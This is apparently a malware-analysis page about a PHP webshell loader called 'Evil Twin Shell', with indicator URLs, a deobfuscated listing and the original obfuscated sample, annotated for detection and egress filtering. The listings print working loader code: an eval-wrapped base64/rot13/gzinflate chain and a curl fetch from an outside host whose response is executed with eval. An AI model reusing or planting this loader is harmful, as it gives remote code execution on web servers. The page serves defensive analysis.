PHP Malware Analysis


Tags

URLs
https://github.com/eviltwin-id/eviltwin-shell
https://shell.sec666.host/sh3e3e3e3e3e3e3ellll
Execution
eval

Deobfuscated code

<?php

// Analyst summary: this listing is deobfuscator output for a small PHP loader.
// Everything it does happens in the innermost block below: it downloads content
// from a remote host and passes the response to eval(). The final payload is
// therefore not contained in this file and can change between requests.
//
// NOTE(review): `eval /* PHPDeobfuscator eval output */ { ... }` is the
// deobfuscator's notation for "code that was handed to eval()"; it is not
// syntax that PHP itself would parse.

// Evil Twin Shell
// Download : https://github.com/eviltwin-id/eviltwin-shell
// Mini Size But Many Features!
// 32 hex characters: presumably an MD5 digest of the operator's access password
// (unverified). Nothing in this listing reads $auth_pass; whether the remotely
// fetched code uses it cannot be determined from here.
$auth_pass = "03b8e16719bdfb9b60544bd0403d9d53";
eval /* PHPDeobfuscator eval output */ {
    // Intermediate obfuscation layer. $X appears to be base64 over a URL-encoded
    // string naming a further eval/decompress chain applied to
    // strrev($Fadly31337) - TODO confirm by decoding offline in a sandbox.
    $X = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNEZhZGx5MzEzMzclMjklMjklMjklMjklMjklMjklMjklMjklM0I=";
    // Starts with "==", i.e. base64 padding at the front, which is consistent
    // with a base64 string stored reversed.
    $Fadly31337 = "==w6/8mVk7CrfCwBvV2yNnWqSeqrn+mbhOKmWqVnp1KVMoZkaVZ2EmsV0SNMRJdDzZ3C0LXCLIfDJ0gcPkICPEv8N4AcRddyQFNKvkcLO1y6GQ71QBCHDLypYoYAu8CyLP9MzYTTOtS0J3MSO/y1SbLKpkCKPDV0ssMzPnoyt4CSVB7VJLV5gjCyvE7sci3/2BQiBwJe/vGAUGw/mBQmB8fYA4ZA";
    eval /* PHPDeobfuscator eval output */ {
        // Stage 2: outbound HTTPS request from the web server to the host
        // listed under "URLs" on this page. This hostname is the primary
        // network indicator for egress filtering and proxy/DNS log review.
        $o = curl_init('https://shell.sec666.host/sh3e3e3e3e3e3e3ellll');
        // Return the response body as a string instead of printing it.
        curl_setopt($o, CURLOPT_RETURNTRANSFER, 1);
        $i = curl_exec($o);
        // The response is executed unchecked: the '?>' prefix leaves PHP mode so
        // the body is treated as a template, and any <?php ... ?> sections in it
        // run with the web server's privileges. No integrity or content check is
        // applied before execution.
        eval('?>' . $i);
    };
    // Terminates the request after the remote code has run; nothing else in the
    // hosting file executes past this point.
    exit;
};


Original code

<?php
// Analyst note: header of the sample as found on disk. The banner comments
// and the $auth_pass assignment are in clear text; only the eval() statement
// that follows them is obfuscated.
// Evil Twin Shell
// Download : https://github.com/eviltwin-id/eviltwin-shell
// Mini Size But Many Features!
// 32 hex characters: presumably an MD5 digest of an access password
// (unverified). The constant value and the banner strings above are usable as
// static indicators when hunting for copies of this file in a web root.
$auth_pass = "03b8e16719bdfb9b60544bd0403d9d53"; // eviltwin.id
// Obfuscated loader. Reading the call chain inside-out: the double-quoted
// literal (written entirely as octal/hex escapes) is passed to base64_decode(),
// then str_rot13(), then gzinflate(), then str_rot13() again, and the result
// is handed to eval(). Per the "Deobfuscated code" section of this page, the
// layers end in a curl fetch whose response is itself eval()'d.
// Detection hint: eval() wrapped directly around nested
// str_rot13/gzinflate/base64_decode calls on a long escaped literal is a
// high-signal pattern for webshell scanning.
// NOTE(review): in this listing the literal is wrapped mid-escape ("\x7" at the
// end of one line, "3" at the start of the next). That looks like a page
// rendering artifact and likely changes the decoded bytes - work from the raw
// sample, not from a copy of this listing.
eval(str_rot13(gzinflate(str_rot13(base64_decode("\152\x59\x39\127\x59\x71\x4e\x41\105\111\x58\x76\111\x38\x31\x2f\151\103\x49\x66\x4d\x73\161\102\x63\x34\154\x6b\x46\x50\x6e\101\142\53\167\117\116\114\123\170\167\x39\x4b\130\105\143\x62\107\x78\156\x5a\x4a\x42\x30\57\63\162\167\x2b\x57\x6b\x73\x4d\143\112\x6c\144\x57\x6e\60\x66\x76\154\126\x64\164\x59\155\57\146\172\107\x4a\150\x6b\x59\62\66\103\x71\x2b\157\x50\161\x49\154\107\67\107\123\x57\154\116\101\115\117\x49\x77\70\157\x36\123\x42\161\70\113\163\x2f\x2f\x6e\x61\125\x39\154\113\x6b\x6c\143\171\171\166\142\157\70\x6a\127\151\155\115\x5a\x4b\x50\x2f\x78\60\x6f\161\152\x7a\114\105\130\x37\x43\146\x61\64\x5a\x73\103\114\122\61\147\127\101\x76\155\126\x59\x38\x44\x73\163\132\x63\x4c\x78\161\x6f\153\65\101\x31\x2f\130\122\x54\110\x32\x68\61\53\57\160\x41\103\162\x38\147\x55\152\x31\172\110\114\x34\x48\102\120\x50\142\x70\x39\x2b\x2f\112\160\165\x79\142\153\x63\127\143\x6b\171\71\x31\160\67\120\x7a\x30\132\165\x78\165\x47\x67\64\163\115\x46\156\x37\x30\143\126\x33\104\106\x35\67\x33\x56\x37\x67\57\x4a\x50\141\x38\66\x50\145\114\120\145\65\151\x6b\x62\x77\124\x4a\x44\147\60\x6c\125\132\114\120\x4d\167\147\x73\x6a\x53\172\x43\143\61\60\147\107\x59\x50\x59\x78\x6d\x52\152\x54\111\146\x67\162\x54\141\x47\x41\x42\164\x2b\120\164\115\125\164\x31\64\60\x44\124\125\63\x54\x5a\x51\120\x61\113\171\x4c\132\x37\x6f\61\123\116\110\x30\x38\115\x73\66\x70\161\155\x7a\132\164\172\x54\x44\116\x50\131\x61\x79\123\x46\x73\61\x7a\x71\x56\101\165\105\x4d\162\106\156\147\131\x70\112\x46\x56\124\160\x67\103\116\167\x44\125\x36\127\x6b\x63\x4a\126\x61\x66\x53\157\x59\101\x74\x74\113\147\170\167\x2b\120\104\x32\x6a\x6e\x62\x75\161\60\172\144\171\64\x4c\x6b\155\x62\x31\x71\104\154\x73\150\63\67\x71\162\67\125\x7a\147\156\163\x6d\71\x32\x63\126\x6b\106\x65\x52\x65\66\x37\132\163\x79\145\x36\66\x49\63\x52\115\62\164\132\71\171\145\161\165\x50\110\106\57\x6d\x37\x62\x65\116\145\63\x64\66\x63\x41\x2b\164\66\162\115\x32\161\156\x79\x35\x55\x4c\x7
3\x50\53\x4e\x63\166\61\x2f\x37\64\71\115\110")))));
?>